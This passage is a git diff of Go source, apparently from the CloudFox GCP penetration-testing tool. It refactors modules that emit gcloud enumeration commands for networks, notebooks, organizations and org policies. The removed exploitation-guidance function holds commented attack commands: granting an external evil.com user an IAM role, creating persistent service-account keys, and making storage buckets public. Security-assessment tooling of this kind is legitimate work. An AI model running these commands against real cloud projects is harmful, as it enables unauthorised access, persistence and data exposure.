List peering routes (incoming):\n"+ + "gcloud compute networks peerings list-routes %s --project=%s --network=%s --region=REGION --direction=INCOMING\n\n"+ + "# List peering routes (outgoing):\n"+ + "gcloud compute networks peerings list-routes %s --project=%s --network=%s --region=REGION --direction=OUTGOING\n\n", + p.Name, p.ProjectID, + m.extractNetworkName(p.Network), m.extractNetworkName(p.PeerNetwork), p.PeerProjectID, p.ProjectID, p.Name, p.ProjectID, m.extractNetworkName(p.Network), + p.Name, p.ProjectID, m.extractNetworkName(p.Network), ) } - // Trust Boundaries table - trustHeader := []string{ - "Name", - "Type", - "Source", - "Target", - "Risk Level", - } - - var trustBody [][]string - for _, t := range m.TrustBoundarie { - trustBody = append(trustBody, []string{ - t.Name, - t.Type, - truncateString(t.SourceScope, 40), - truncateString(t.TargetScope, 40), - t.RiskLevel, - }) - } - // Cloud NAT table natHeader := []string{ - "Name", "Project Name", "Project ID", + "Name", "Region", "Network", "NAT IPs", @@ -834,48 +751,45 @@ func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal var natBody [][]string for _, nat := range m.NATs { - natIPs := strings.Join(nat.NATIPAddresses, ",") - if len(natIPs) > 30 { - natIPs = fmt.Sprintf("%d IPs", len(nat.NATIPAddresses)) + natIPs := strings.Join(nat.NATIPAddresses, ", ") + if natIPs == "" { + natIPs = "AUTO" } natBody = append(natBody, []string{ - nat.Name, m.GetProjectName(nat.ProjectID), nat.ProjectID, + nat.Name, nat.Region, m.extractNetworkName(nat.Network), natIPs, - fmt.Sprintf("%t", nat.EnableLogging), + boolToYesNo(nat.EnableLogging), }) - // Add to NAT analysis loot - m.LootMap["nat-analysis"].Contents += fmt.Sprintf( - "## Cloud NAT: %s\n"+ - "Project: %s\n"+ - "Region: %s\n"+ - "Network: %s\n"+ - "NAT IPs: %v\n"+ - "Min Ports Per VM: %d\n"+ - "Logging Enabled: %t\n\n", - nat.Name, - nat.ProjectID, - nat.Region, - m.extractNetworkName(nat.Network), - nat.NATIPAddresses, - nat.MinPortsPerVM, - nat.EnableLogging, + // Add NAT commands to loot + m.LootMap["network-topology-commands"].Contents += fmt.Sprintf( + "## Cloud NAT: %s (Project: %s, Region: %s)\n"+ + "# Describe router with NAT config:\n"+ + "gcloud compute routers describe ROUTER_NAME --region=%s --project=%s\n\n"+ + "# List NAT mappings:\n"+ + "gcloud compute routers get-nat-mapping-info ROUTER_NAME --region=%s --project=%s\n\n", + nat.Name, nat.ProjectID, nat.Region, + nat.Region, nat.ProjectID, + nat.Region, nat.ProjectID, ) } - // Shared VPC commands + // Add Shared VPC commands to loot for hostProject, config := range m.SharedVPCs { - m.LootMap["shared-vpc-commands"].Contents += fmt.Sprintf( + m.LootMap["network-topology-commands"].Contents += fmt.Sprintf( "## Shared VPC Host: %s\n"+ - "Service Projects: %v\n\n"+ + "# Service Projects: %v\n"+ "# List Shared VPC resources:\n"+ - "gcloud compute shared-vpc list-associated-resources %s\n"+ - "gcloud compute shared-vpc get-host-project %s\n\n", + "gcloud compute shared-vpc list-associated-resources %s\n\n"+ + "# Get host project for service project:\n"+ + "gcloud compute shared-vpc get-host-project SERVICE_PROJECT_ID\n\n"+ + "# List usable subnets for service project:\n"+ + "gcloud compute networks subnets list-usable --project=%s\n\n", hostProject, config.ServiceProjects, hostProject, @@ -886,7 +800,7 @@ func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -916,14 +830,6 @@ func (m *NetworkTopologyModule) writeOutput(ctx context.Context, logger internal }) } - if len(trustBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "trust-boundaries", - Header: trustHeader, - Body: trustBody, - }) - } - if len(natBody) > 0 { tables = append(tables, internal.TableFile{ Name: "cloud-nat", diff --git a/gcp/commands/notebooks.go b/gcp/commands/notebooks.go index 96d40665..4f04070a 100644 --- a/gcp/commands/notebooks.go +++ b/gcp/commands/notebooks.go @@ -112,24 +112,41 @@ func (m *NotebooksModule) processProject(ctx context.Context, projectID string, } func (m *NotebooksModule) initializeLootFiles() { - m.LootMap["notebooks"] = &internal.LootFile{ - Name: "notebooks", - Contents: "# Notebook Instances\n# Generated by CloudFox\n\n", - } - m.LootMap["notebook-service-accounts"] = &internal.LootFile{ - Name: "notebook-service-accounts", - Contents: "", + m.LootMap["notebooks-commands"] = &internal.LootFile{ + Name: "notebooks-commands", + Contents: "# Notebook Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } func (m *NotebooksModule) addToLoot(instance notebooksservice.NotebookInstanceInfo) { - m.LootMap["notebooks"].Contents += fmt.Sprintf( - "# Instance: %s\n# Location: %s\n# State: %s\n# Service Account: %s\n# Public IP: %v\n\n", - instance.Name, instance.Location, instance.State, instance.ServiceAccount, !instance.NoPublicIP) + m.LootMap["notebooks-commands"].Contents += fmt.Sprintf( + "## Instance: %s (Project: %s, Location: %s)\n"+ + "# State: %s, Service Account: %s\n"+ + "# Public IP: %s, Proxy Access: %s\n", + instance.Name, instance.ProjectID, instance.Location, + instance.State, instance.ServiceAccount, + boolToYesNo(!instance.NoPublicIP), boolToYesNo(!instance.NoProxyAccess), + ) - if instance.ServiceAccount != "" { - m.LootMap["notebook-service-accounts"].Contents += instance.ServiceAccount + "\n" + if instance.ProxyUri != "" { + m.LootMap["notebooks-commands"].Contents += fmt.Sprintf( + "# Proxy URI: %s\n", instance.ProxyUri) } + + m.LootMap["notebooks-commands"].Contents += fmt.Sprintf( + "\n# Describe instance:\n"+ + "gcloud notebooks instances describe %s --location=%s --project=%s\n\n"+ + "# Get JupyterLab proxy URL:\n"+ + "gcloud notebooks instances describe %s --location=%s --project=%s --format='value(proxyUri)'\n\n"+ + "# Start instance (if stopped):\n"+ + "gcloud notebooks instances start %s --location=%s --project=%s\n\n"+ + "# Stop instance:\n"+ + "gcloud notebooks instances stop %s --location=%s --project=%s\n\n", + instance.Name, instance.Location, instance.ProjectID, + instance.Name, instance.Location, instance.ProjectID, + instance.Name, instance.Location, instance.ProjectID, + instance.Name, instance.Location, instance.ProjectID, + ) } func (m *NotebooksModule) writeOutput(ctx context.Context, logger internal.Logger) { @@ -137,34 +154,63 @@ func (m *NotebooksModule) writeOutput(ctx context.Context, logger internal.Logge // Instances table if len(m.Instances) > 0 { - header := []string{"Name", "Location", "State", "Machine Type", "Service Account", "Public IP", "GPU", "Risk", "Project Name", "Project"} + header := []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "State", + "Machine Type", + "Service Account", + "Network", + "Subnet", + "Public IP", + "Proxy Access", + "Proxy URI", + "GPU", + "Creator", + } var body [][]string for _, instance := range m.Instances { - publicIP := "No" - if !instance.NoPublicIP { - publicIP = "Yes" - } - gpu := "None" + gpu := "-" if instance.AcceleratorCount > 0 { gpu = fmt.Sprintf("%s x%d", instance.AcceleratorType, instance.AcceleratorCount) } sa := instance.ServiceAccount if sa == "" { sa = "(default)" - } else if len(sa) > 40 { - sa = sa[:37] + "..." + } + network := instance.Network + if network == "" { + network = "-" + } + subnet := instance.Subnet + if subnet == "" { + subnet = "-" + } + proxyUri := instance.ProxyUri + if proxyUri == "" { + proxyUri = "-" + } + creator := instance.Creator + if creator == "" { + creator = "-" } body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, instance.Name, instance.Location, instance.State, instance.MachineType, sa, - publicIP, + network, + subnet, + boolToYesNo(!instance.NoPublicIP), + boolToYesNo(!instance.NoProxyAccess), + proxyUri, gpu, - instance.RiskLevel, - m.GetProjectName(instance.ProjectID), - instance.ProjectID, + creator, }) } tables = append(tables, internal.TableFile{ @@ -176,18 +222,43 @@ func (m *NotebooksModule) writeOutput(ctx context.Context, logger internal.Logge // Runtimes table if len(m.Runtimes) > 0 { - header := []string{"Name", "Location", "State", "Type", "Machine Type", "Risk", "Project Name", "Project"} + header := []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "State", + "Type", + "Machine Type", + "Service Account", + "Network", + "Subnet", + } var body [][]string for _, runtime := range m.Runtimes { + sa := runtime.ServiceAccount + if sa == "" { + sa = "-" + } + network := runtime.Network + if network == "" { + network = "-" + } + subnet := runtime.Subnet + if subnet == "" { + subnet = "-" + } body = append(body, []string{ + m.GetProjectName(runtime.ProjectID), + runtime.ProjectID, runtime.Name, runtime.Location, runtime.State, runtime.RuntimeType, runtime.MachineType, - runtime.RiskLevel, - m.GetProjectName(runtime.ProjectID), - runtime.ProjectID, + sa, + network, + subnet, }) } tables = append(tables, internal.TableFile{ @@ -197,31 +268,9 @@ func (m *NotebooksModule) writeOutput(ctx context.Context, logger internal.Logge }) } - // High-risk findings - var highRiskBody [][]string - for _, instance := range m.Instances { - if instance.RiskLevel == "HIGH" || instance.RiskLevel == "MEDIUM" { - highRiskBody = append(highRiskBody, []string{ - instance.Name, - instance.RiskLevel, - strings.Join(instance.RiskReasons, "; "), - m.GetProjectName(instance.ProjectID), - instance.ProjectID, - }) - } - } - - if len(highRiskBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "notebook-risks", - Header: []string{"Instance", "Risk Level", "Reasons", "Project Name", "Project"}, - Body: highRiskBody, - }) - } - var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/organizations.go b/gcp/commands/organizations.go index ee0df30d..be3f129a 100644 --- a/gcp/commands/organizations.go +++ b/gcp/commands/organizations.go @@ -134,30 +134,21 @@ func (m *OrganizationsModule) Execute(ctx context.Context, logger internal.Logge // Loot File Management // ------------------------------ func (m *OrganizationsModule) initializeLootFiles() { - m.LootMap["org-hierarchy"] = &internal.LootFile{ - Name: "org-hierarchy", - Contents: "# GCP Organization Hierarchy\n# Generated by CloudFox\n\n", - } - m.LootMap["org-all-projects"] = &internal.LootFile{ - Name: "org-all-projects", - Contents: "", - } - m.LootMap["org-gcloud-commands"] = &internal.LootFile{ - Name: "org-gcloud-commands", - Contents: "# Organization Enumeration Commands\n# Generated by CloudFox\n\n", + m.LootMap["organizations-commands"] = &internal.LootFile{ + Name: "organizations-commands", + Contents: "# GCP Organization Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } func (m *OrganizationsModule) generateLoot() { - // All project IDs - for _, proj := range m.Projects { - m.LootMap["org-all-projects"].Contents += proj.ProjectID + "\n" - } - // Hierarchy visualization + m.LootMap["organizations-commands"].Contents += "# ==========================================\n" + m.LootMap["organizations-commands"].Contents += "# ORGANIZATION HIERARCHY\n" + m.LootMap["organizations-commands"].Contents += "# ==========================================\n\n" + for _, org := range m.Organizations { orgID := strings.TrimPrefix(org.Name, "organizations/") - m.LootMap["org-hierarchy"].Contents += fmt.Sprintf("Organization: %s (%s)\n", org.DisplayName, orgID) + m.LootMap["organizations-commands"].Contents += fmt.Sprintf("Organization: %s (%s)\n", org.DisplayName, orgID) // Find folders directly under this org for _, folder := range m.Folders { @@ -169,22 +160,26 @@ func (m *OrganizationsModule) generateLoot() { // Find projects directly under this org for _, proj := range m.Projects { if proj.Parent == org.Name { - m.LootMap["org-hierarchy"].Contents += fmt.Sprintf(" └── Project: %s (%s)\n", proj.DisplayName, proj.ProjectID) + m.LootMap["organizations-commands"].Contents += fmt.Sprintf(" └── Project: %s (%s)\n", proj.DisplayName, proj.ProjectID) } } - m.LootMap["org-hierarchy"].Contents += "\n" + m.LootMap["organizations-commands"].Contents += "\n" } - // Gcloud commands + // Gcloud commands for organizations + m.LootMap["organizations-commands"].Contents += "# ==========================================\n" + m.LootMap["organizations-commands"].Contents += "# ORGANIZATION COMMANDS\n" + m.LootMap["organizations-commands"].Contents += "# ==========================================\n\n" + for _, org := range m.Organizations { orgID := strings.TrimPrefix(org.Name, "organizations/") - m.LootMap["org-gcloud-commands"].Contents += fmt.Sprintf( - "# Organization: %s\n"+ + m.LootMap["organizations-commands"].Contents += fmt.Sprintf( + "## Organization: %s (%s)\n"+ "gcloud organizations describe %s\n"+ "gcloud organizations get-iam-policy %s\n"+ "gcloud resource-manager folders list --organization=%s\n"+ "gcloud projects list --filter='parent.id=%s'\n\n", - org.DisplayName, + org.DisplayName, orgID, orgID, orgID, orgID, @@ -192,23 +187,34 @@ func (m *OrganizationsModule) generateLoot() { ) } - for _, folder := range m.Folders { - folderID := strings.TrimPrefix(folder.Name, "folders/") - m.LootMap["org-gcloud-commands"].Contents += fmt.Sprintf( - "# Folder: %s\n"+ - "gcloud resource-manager folders describe %s\n"+ - "gcloud resource-manager folders get-iam-policy %s\n\n", - folder.DisplayName, - folderID, - folderID, - ) + // Gcloud commands for folders + if len(m.Folders) > 0 { + m.LootMap["organizations-commands"].Contents += "# ==========================================\n" + m.LootMap["organizations-commands"].Contents += "# FOLDER COMMANDS\n" + m.LootMap["organizations-commands"].Contents += "# ==========================================\n\n" + + for _, folder := range m.Folders { + folderID := strings.TrimPrefix(folder.Name, "folders/") + m.LootMap["organizations-commands"].Contents += fmt.Sprintf( + "## Folder: %s (%s)\n"+ + "gcloud resource-manager folders describe %s\n"+ + "gcloud resource-manager folders get-iam-policy %s\n"+ + "gcloud resource-manager folders list --folder=%s\n"+ + "gcloud projects list --filter='parent.id=%s'\n\n", + folder.DisplayName, folderID, + folderID, + folderID, + folderID, + folderID, + ) + } } } func (m *OrganizationsModule) addFolderToHierarchy(folder orgsservice.FolderInfo, depth int) { indent := strings.Repeat(" ", depth) folderID := strings.TrimPrefix(folder.Name, "folders/") - m.LootMap["org-hierarchy"].Contents += fmt.Sprintf("%s├── Folder: %s (%s)\n", indent, folder.DisplayName, folderID) + m.LootMap["organizations-commands"].Contents += fmt.Sprintf("%s├── Folder: %s (%s)\n", indent, folder.DisplayName, folderID) // Find child folders for _, childFolder := range m.Folders { @@ -220,7 +226,7 @@ func (m *OrganizationsModule) addFolderToHierarchy(folder orgsservice.FolderInfo // Find projects under this folder for _, proj := range m.Projects { if proj.Parent == folder.Name { - m.LootMap["org-hierarchy"].Contents += fmt.Sprintf("%s └── Project: %s (%s)\n", indent, proj.DisplayName, proj.ProjectID) + m.LootMap["organizations-commands"].Contents += fmt.Sprintf("%s └── Project: %s (%s)\n", indent, proj.DisplayName, proj.ProjectID) } } } @@ -269,8 +275,8 @@ func (m *OrganizationsModule) writeOutput(ctx context.Context, logger internal.L // Projects table projectsHeader := []string{ - "Project Name", "Project ID", + "Project Name", "Display Name", "Parent", "State", @@ -279,8 +285,8 @@ func (m *OrganizationsModule) writeOutput(ctx context.Context, logger internal.L var projectsBody [][]string for _, proj := range m.Projects { projectsBody = append(projectsBody, []string{ - m.GetProjectName(proj.ProjectID), proj.ProjectID, + m.GetProjectName(proj.ProjectID), proj.DisplayName, proj.Parent, proj.State, @@ -289,8 +295,8 @@ func (m *OrganizationsModule) writeOutput(ctx context.Context, logger internal.L // Ancestry table ancestryHeader := []string{ + "Project ID", "Project Name", - "Project", "Ancestry Path", } @@ -307,8 +313,8 @@ func (m *OrganizationsModule) writeOutput(ctx context.Context, logger internal.L path = append(path, fmt.Sprintf("%s:%s", node.Type, node.ID)) } ancestryBody = append(ancestryBody, []string{ - m.GetProjectName(projectID), projectID, + m.GetProjectName(projectID), strings.Join(path, " -> "), }) } @@ -317,7 +323,7 @@ func (m *OrganizationsModule) writeOutput(ctx context.Context, logger internal.L // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } diff --git a/gcp/commands/orgpolicies.go b/gcp/commands/orgpolicies.go index 707aedff..9f9d961b 100644 --- a/gcp/commands/orgpolicies.go +++ b/gcp/commands/orgpolicies.go @@ -78,20 +78,7 @@ func (m *OrgPoliciesModule) Execute(ctx context.Context, logger internal.Logger) return } - // Count by risk level - highCount := 0 - mediumCount := 0 - for _, policy := range m.Policies { - switch policy.RiskLevel { - case "HIGH": - highCount++ - case "MEDIUM": - mediumCount++ - } - } - - logger.SuccessM(fmt.Sprintf("Found %d organization policy(ies) (%d HIGH, %d MEDIUM risk)", - len(m.Policies), highCount, mediumCount), globals.GCP_ORGPOLICIES_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("Found %d organization policy(ies)", len(m.Policies)), globals.GCP_ORGPOLICIES_MODULE_NAME) m.writeOutput(ctx, logger) } @@ -118,168 +105,103 @@ func (m *OrgPoliciesModule) processProject(ctx context.Context, projectID string } func (m *OrgPoliciesModule) initializeLootFiles() { - m.LootMap["orgpolicies-all"] = &internal.LootFile{ - Name: "orgpolicies-all", - Contents: "# GCP Organization Policies\n# Generated by CloudFox\n\n", - } - m.LootMap["orgpolicies-weak"] = &internal.LootFile{ - Name: "orgpolicies-weak", - Contents: "# GCP Weak/Misconfigured Organization Policies\n# Generated by CloudFox\n# These policies may weaken security posture\n\n", - } - m.LootMap["orgpolicies-exploitation"] = &internal.LootFile{ - Name: "orgpolicies-exploitation", - Contents: "# GCP Organization Policy Exploitation Opportunities\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + m.LootMap["orgpolicies-commands"] = &internal.LootFile{ + Name: "orgpolicies-commands", + Contents: "# Organization Policy Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } } func (m *OrgPoliciesModule) addPolicyToLoot(policy orgpolicyservice.OrgPolicyInfo) { - // All policies - m.LootMap["orgpolicies-all"].Contents += fmt.Sprintf( - "## Constraint: %s\n"+ - "## Project: %s\n"+ - "## Enforced: %v\n"+ - "## AllowAll: %v, DenyAll: %v\n"+ - "## Inherit: %v\n"+ - "## Risk: %s\n", - policy.Constraint, - policy.ProjectID, - policy.Enforced, - policy.AllowAll, policy.DenyAll, - policy.InheritParent, - policy.RiskLevel, + // Extract short constraint name for commands + constraintName := policy.Constraint + if strings.HasPrefix(constraintName, "constraints/") { + constraintName = strings.TrimPrefix(constraintName, "constraints/") + } + + m.LootMap["orgpolicies-commands"].Contents += fmt.Sprintf( + "## Constraint: %s (Project: %s)\n", + policy.Constraint, policy.ProjectID, + ) + + if policy.Description != "" { + m.LootMap["orgpolicies-commands"].Contents += fmt.Sprintf("# Description: %s\n", policy.Description) + } + + m.LootMap["orgpolicies-commands"].Contents += fmt.Sprintf( + "# Enforced: %s, AllowAll: %s, DenyAll: %s, Inherit: %s\n", + boolToYesNo(policy.Enforced), + boolToYesNo(policy.AllowAll), + boolToYesNo(policy.DenyAll), + boolToYesNo(policy.InheritParent), ) + if len(policy.AllowedValues) > 0 { - m.LootMap["orgpolicies-all"].Contents += fmt.Sprintf("## Allowed: %s\n", strings.Join(policy.AllowedValues, ", ")) + m.LootMap["orgpolicies-commands"].Contents += fmt.Sprintf("# Allowed Values: %s\n", strings.Join(policy.AllowedValues, ", ")) } if len(policy.DeniedValues) > 0 { - m.LootMap["orgpolicies-all"].Contents += fmt.Sprintf("## Denied: %s\n", strings.Join(policy.DeniedValues, ", ")) - } - m.LootMap["orgpolicies-all"].Contents += "\n" - - // Weak policies - if policy.RiskLevel == "HIGH" || policy.RiskLevel == "MEDIUM" { - m.LootMap["orgpolicies-weak"].Contents += fmt.Sprintf( - "## [%s] %s\n"+ - "## Project: %s\n"+ - "## Security Impact: %s\n", - policy.RiskLevel, policy.Constraint, - policy.ProjectID, - policy.SecurityImpact, - ) - if len(policy.RiskReasons) > 0 { - m.LootMap["orgpolicies-weak"].Contents += "## Reasons:\n" - for _, reason := range policy.RiskReasons { - m.LootMap["orgpolicies-weak"].Contents += fmt.Sprintf("## - %s\n", reason) - } - } - m.LootMap["orgpolicies-weak"].Contents += "\n" - - // Add exploitation guidance for high-risk policies - if policy.RiskLevel == "HIGH" { - m.LootMap["orgpolicies-exploitation"].Contents += fmt.Sprintf( - "## [%s] %s (Project: %s)\n"+ - "## Impact: %s\n", - policy.RiskLevel, policy.Constraint, policy.ProjectID, - policy.SecurityImpact, - ) - m.LootMap["orgpolicies-exploitation"].Contents += m.getExploitationGuidance(policy) - m.LootMap["orgpolicies-exploitation"].Contents += "\n" - } + m.LootMap["orgpolicies-commands"].Contents += fmt.Sprintf("# Denied Values: %s\n", strings.Join(policy.DeniedValues, ", ")) } -} -func (m *OrgPoliciesModule) getExploitationGuidance(policy orgpolicyservice.OrgPolicyInfo) string { - switch { - case strings.Contains(policy.Constraint, "iam.allowedPolicyMemberDomains"): - return "## Exploitation: Can add external users/SAs to IAM policies\n" + - "# gcloud projects add-iam-policy-binding " + policy.ProjectID + " --member=user:external@evil.com --role=roles/viewer\n" - case strings.Contains(policy.Constraint, "iam.disableServiceAccountKeyCreation"): - return "## Exploitation: Can create persistent SA keys\n" + - "# gcloud iam service-accounts keys create key.json --iam-account=SA_EMAIL\n" - case strings.Contains(policy.Constraint, "compute.vmExternalIpAccess"): - return "## Exploitation: Can create VMs with external IPs\n" + - "# VMs can be created with public internet access\n" - case strings.Contains(policy.Constraint, "storage.publicAccessPrevention"): - return "## Exploitation: Can make buckets/objects public\n" + - "# gsutil iam ch allUsers:objectViewer gs://BUCKET_NAME\n" - case strings.Contains(policy.Constraint, "sql.restrictPublicIp"): - return "## Exploitation: Can create Cloud SQL with public IP\n" + - "# Database may be accessible from internet\n" - case strings.Contains(policy.Constraint, "workloadIdentityPoolProviders"): - return "## Exploitation: Can configure external identity providers\n" + - "# External identities can assume GCP service account permissions\n" - default: - return "## Check constraint documentation for exploitation paths\n" - } + m.LootMap["orgpolicies-commands"].Contents += fmt.Sprintf( + "\n# Describe this policy:\n"+ + "gcloud org-policies describe %s --project=%s\n\n"+ + "# Get effective policy (includes inheritance):\n"+ + "gcloud org-policies describe %s --project=%s --effective\n\n", + constraintName, policy.ProjectID, + constraintName, policy.ProjectID, + ) } func (m *OrgPoliciesModule) writeOutput(ctx context.Context, logger internal.Logger) { // Main policies table header := []string{ + "Project Name", + "Project ID", "Constraint", - "Risk", + "Description", "Enforced", - "AllowAll", - "DenyAll", + "Allow All", + "Deny All", "Inherit", - "Security Impact", - "Project Name", - "Project", + "Allowed Values", + "Denied Values", } var body [][]string for _, policy := range m.Policies { - impact := policy.SecurityImpact - if len(impact) > 50 { - impact = impact[:50] + "..." + description := policy.Description + if description == "" { + description = "-" + } + + allowedValues := "-" + if len(policy.AllowedValues) > 0 { + allowedValues = strings.Join(policy.AllowedValues, ", ") + } + + deniedValues := "-" + if len(policy.DeniedValues) > 0 { + deniedValues = strings.Join(policy.DeniedValues, ", ") } body = append(body, []string{ - policy.Constraint, - policy.RiskLevel, - orgPolicyBoolToYesNo(policy.Enforced), - orgPolicyBoolToYesNo(policy.AllowAll), - orgPolicyBoolToYesNo(policy.DenyAll), - orgPolicyBoolToYesNo(policy.InheritParent), - impact, m.GetProjectName(policy.ProjectID), policy.ProjectID, + policy.Constraint, + description, + boolToYesNo(policy.Enforced), + boolToYesNo(policy.AllowAll), + boolToYesNo(policy.DenyAll), + boolToYesNo(policy.InheritParent), + allowedValues, + deniedValues, }) } - // Weak policies table - weakHeader := []string{ - "Risk", - "Constraint", - "Project Name", - "Project", - "Security Impact", - "Reasons", - } - - var weakBody [][]string - for _, policy := range m.Policies { - if policy.RiskLevel == "HIGH" || policy.RiskLevel == "MEDIUM" { - reasons := strings.Join(policy.RiskReasons, "; ") - if len(reasons) > 60 { - reasons = reasons[:60] + "..." - } - - weakBody = append(weakBody, []string{ - policy.RiskLevel, - policy.Constraint, - m.GetProjectName(policy.ProjectID), - policy.ProjectID, - policy.SecurityImpact, - reasons, - }) - } - } - // Collect loot files var lootFiles []internal.LootFile for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { lootFiles = append(lootFiles, *loot) } } @@ -292,15 +214,6 @@ func (m *OrgPoliciesModule) writeOutput(ctx context.Context, logger internal.Log }, } - if len(weakBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "orgpolicies-weak", - Header: weakHeader, - Body: weakBody, - }) - logger.InfoM(fmt.Sprintf("[PENTEST] Found %d weak/misconfigured organization policies!", len(weakBody)), globals.GCP_ORGPOLICIES_MODULE_NAME) - } - output := OrgPoliciesOutput{Table: tables, Loot: lootFiles} scopeNames := make([]string, len(m.ProjectIDs)) @@ -315,8 +228,8 @@ func (m *OrgPoliciesModule) writeOutput(ctx context.Context, logger internal.Log m.Verbosity, m.WrapTable, "project", - scopeNames, m.ProjectIDs, + scopeNames, m.Account, output, ) @@ -324,10 +237,3 @@ func (m *OrgPoliciesModule) writeOutput(ctx context.Context, logger internal.Log logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_ORGPOLICIES_MODULE_NAME) } } - -func orgPolicyBoolToYesNo(b bool) string { - if b { - return "Yes" - } - return "No" -} diff --git a/gcp/commands/permissions.go b/gcp/commands/permissions.go index c35e8ef1..c3ec89b0 100644 --- a/gcp/commands/permissions.go +++ b/gcp/commands/permissions.go @@ -9,7 +9,6 @@ import ( IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" orgsservice "github.com/BishopFox/cloudfox/gcp/services/organizationsService" - privescservice "github.com/BishopFox/cloudfox/gcp/services/privescService" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" @@ -32,22 +31,7 @@ This module provides COMPLETE permission visibility by: - Identifying cross-project access patterns - Flagging dangerous/privesc permissions -Output Tables: -1. permissions-exploded: ONE ROW PER PERMISSION with full context -2. permissions-summary: Entity summary with permission counts -3. permissions-by-scope: Permissions grouped by resource scope (org/folder/project) -4. permissions-dangerous: Privesc-relevant permissions -5. permissions-cross-project: Permissions granting cross-project access - -Each permission row includes: -- Entity (user/SA/group) -- Permission name -- Role that grants this permission -- Resource scope (organization/folder/project ID) -- Inheritance source (where the binding was defined) -- Condition (if any IAM conditions apply) - -This is a comprehensive enumeration - expect longer execution times for large organizations.`, +Output: Single unified table with one row per permission entry.`, Run: runGCPPermissionsCommand, } @@ -81,23 +65,26 @@ var highPrivilegePermissionPrefixes = []string{ // ExplodedPermission represents a single permission entry with full context type ExplodedPermission struct { - Entity string // Full entity identifier (e.g., user:foo@example.com) - EntityType string // User, ServiceAccount, Group, etc. - EntityEmail string // Clean email without prefix - Permission string // Individual permission name - Role string // Role that grants this permission - RoleType string // predefined, custom, basic - ResourceScope string // Full resource path (organizations/123, folders/456, projects/xyz) - ResourceScopeType string // organization, folder, project - ResourceScopeID string // Just the ID portion - InheritedFrom string // Where the binding was defined (if different from scope) - IsInherited bool // True if permission comes from a higher level - HasCondition bool // True if IAM condition applies - Condition string // Condition expression if any - EffectiveProject string // The project this permission is effective in - ProjectName string // Display name of the effective project - IsCrossProject bool // True if entity is from different project - SourceProject string // Entity's home project (for cross-project detection) + Entity string + EntityType string + EntityEmail string + Permission string + Role string + RoleType string + ResourceScope string + ResourceScopeType string + ResourceScopeID string + ResourceScopeName string + InheritedFrom string + IsInherited bool + HasCondition bool + Condition string + ConditionTitle string + EffectiveProject string + ProjectName string + IsCrossProject bool + SourceProject string + IsHighPrivilege bool } // ------------------------------ @@ -110,10 +97,14 @@ type PermissionsModule struct { ExplodedPerms []ExplodedPermission EntityPermissions []IAMService.EntityPermissions GroupInfos []IAMService.GroupInfo - OrgBindings []IAMService.PolicyBinding // Organization-level bindings - FolderBindings map[string][]IAMService.PolicyBinding // Folder ID -> bindings + OrgBindings []IAMService.PolicyBinding + FolderBindings map[string][]IAMService.PolicyBinding LootMap map[string]*internal.LootFile mu sync.Mutex + + // Organization info for output path + OrgIDs []string + OrgNames map[string]string } // ------------------------------ @@ -131,13 +122,11 @@ func (o PermissionsOutput) LootFiles() []internal.LootFile { return o.Loot } // Command Entry Point // ------------------------------ func runGCPPermissionsCommand(cmd *cobra.Command, args []string) { - // Initialize command context cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_PERMISSIONS_MODULE_NAME) if err != nil { - return // Error already logged + return } - // Create module instance module := &PermissionsModule{ BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), ExplodedPerms: []ExplodedPermission{}, @@ -146,12 +135,11 @@ func runGCPPermissionsCommand(cmd *cobra.Command, args []string) { OrgBindings: []IAMService.PolicyBinding{}, FolderBindings: make(map[string][]IAMService.PolicyBinding), LootMap: make(map[string]*internal.LootFile), + OrgIDs: []string{}, + OrgNames: make(map[string]string), } - // Initialize loot files module.initializeLootFiles() - - // Execute enumeration module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } @@ -168,7 +156,6 @@ func (m *PermissionsModule) Execute(ctx context.Context, logger internal.Logger) // Run project enumeration with concurrency m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_PERMISSIONS_MODULE_NAME, m.processProject) - // Check results if len(m.ExplodedPerms) == 0 { logger.InfoM("No permissions found", globals.GCP_PERMISSIONS_MODULE_NAME) return @@ -179,7 +166,7 @@ func (m *PermissionsModule) Execute(ctx context.Context, logger internal.Logger) uniquePerms := make(map[string]bool) inheritedCount := 0 crossProjectCount := 0 - dangerousCount := 0 + highPrivCount := 0 for _, ep := range m.ExplodedPerms { uniqueEntities[ep.Entity] = true @@ -190,15 +177,15 @@ func (m *PermissionsModule) Execute(ctx context.Context, logger internal.Logger) 